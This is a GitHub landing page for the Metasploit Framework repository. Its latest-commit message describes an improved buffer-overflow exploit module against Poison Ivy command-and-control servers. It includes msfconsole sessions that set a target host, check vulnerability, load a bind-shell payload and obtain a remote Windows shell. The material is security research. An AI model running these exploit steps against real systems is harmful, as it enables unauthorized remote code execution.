Metasploit Framework
 
 
 
 
 
 
Go to file
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
app turn nil publics and privates into blanks 2014-09-05 16:06:58 -05:00
config Update database.yml.example to ref MSF-DEV 2015-06-16 11:05:03 -05:00
data Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
db Add polymorphic relationship to Mdm::Vuln 2015-05-21 13:39:25 -05:00
documentation Restore the hallowed developer's guide 2014-12-03 16:50:18 -06:00
external Replace external source 2015-08-26 15:32:50 -05:00
features Capitalized 'Accepted' 2015-06-16 19:42:32 +01:00
lib Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
modules This is a modification to the original poisonivy_bof.rb exploit 2015-09-07 17:48:28 +02:00
plugins Check for a nil header value 2015-06-02 18:31:48 -04:00
script rails generate cucumber:install 2014-08-27 14:10:04 -05:00
scripts Remove rb from module name 2015-09-03 09:49:54 +05:00
spec Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
test Another update 2015-07-29 14:31:35 -05:00
tools Land #5967, add PACKETSTORM reference types. 2015-09-01 23:25:26 -05:00
.gitignore remove android meterpreter bins, update to payloads 1.0.2 2015-06-01 09:14:31 -05:00
.gitmodules Add RDI submodule, port Kitrap0d 2013-11-27 16:04:41 +10:00
.mailmap Sorting and adding a couple more -r7 to mailmap 2015-04-30 12:34:31 -05:00
.rspec Add modern --require to .rspec 2014-10-08 10:55:40 -05:00
.rubocop.yml Reapply PR #4113 (removed via #4175) 2014-11-11 15:06:43 -06:00
.ruby-gemset Restoring ruby and gemset files 2014-05-20 10:17:00 -05:00
.ruby-version Bump Ruby version to 2.1.6 2015-05-07 13:22:59 -05:00
.simplecov Remove fastlib 2014-09-18 15:24:21 -05:00
.travis.yml add libpcap-dev to our travis dependencies 2015-09-04 17:24:49 -05:00
.yardopts update .yardopts 2014-07-24 13:59:04 -05:00
CONTRIBUTING.md Revert a couple of the suggested edits 2015-03-30 12:04:15 -05:00
COPYING Happy new year! 2014-12-31 12:12:45 -06:00
Gemfile updating the gemspecs to use the pre-release versions of the other metasploit gems 2015-04-29 14:07:50 -05:00
Gemfile.local.example Fix example Gemfile.local to work with existing 2014-06-24 00:00:47 -05:00
Gemfile.lock Land #5892, update pcaprub to the latest version 2015-09-04 17:26:29 -05:00
HACKING Update link for The Metasploit Development Environment 2014-07-15 10:16:47 -05:00
LICENSE Remove LORCON from LICENSE 2015-02-26 14:53:23 -06:00
README.md Update README.md 2015-03-29 01:08:06 -10:00
Rakefile Merge branch 'feature/MSP-11130/metasploit-framework-spec-constants' into feature/MSP-11147/thread-leak-detection 2014-11-05 15:47:59 -06:00
metasploit-framework-db.gemspec locking the r7 managed gems to specific versions 2015-07-02 14:16:02 -05:00
metasploit-framework-full.gemspec Make the version constraint a range 2014-12-19 13:54:13 -06:00
metasploit-framework-pcap.gemspec Depend on metasloit-framework in optional gemspecs 2014-11-05 12:33:44 -06:00
metasploit-framework.gemspec Land #5892, update pcaprub to the latest version 2015-09-04 17:26:29 -05:00
msfbinscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfconsole Use Rex::Compat.open_file to open profiling report 2014-09-19 11:13:28 -05:00
msfd Remove fastlib 2014-09-18 15:24:21 -05:00
msfelfscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfmachscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfpescan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfrop Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfrpc Change {} back to do/end 2015-03-09 00:00:49 -05:00
msfrpcd allow overriding the default timeout for a session 2015-05-01 15:04:55 -05:00
msfupdate Always use maybe_wait_and_exit in msfupdate 2013-11-15 17:26:21 -06:00
msfvenom Lnad #5660, @wchen-r7's warbird check 2015-07-31 10:25:43 -05:00

README.md

Metasploit Build Status Code Climate

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://metasploit.com

Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework

New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api

Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.

Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.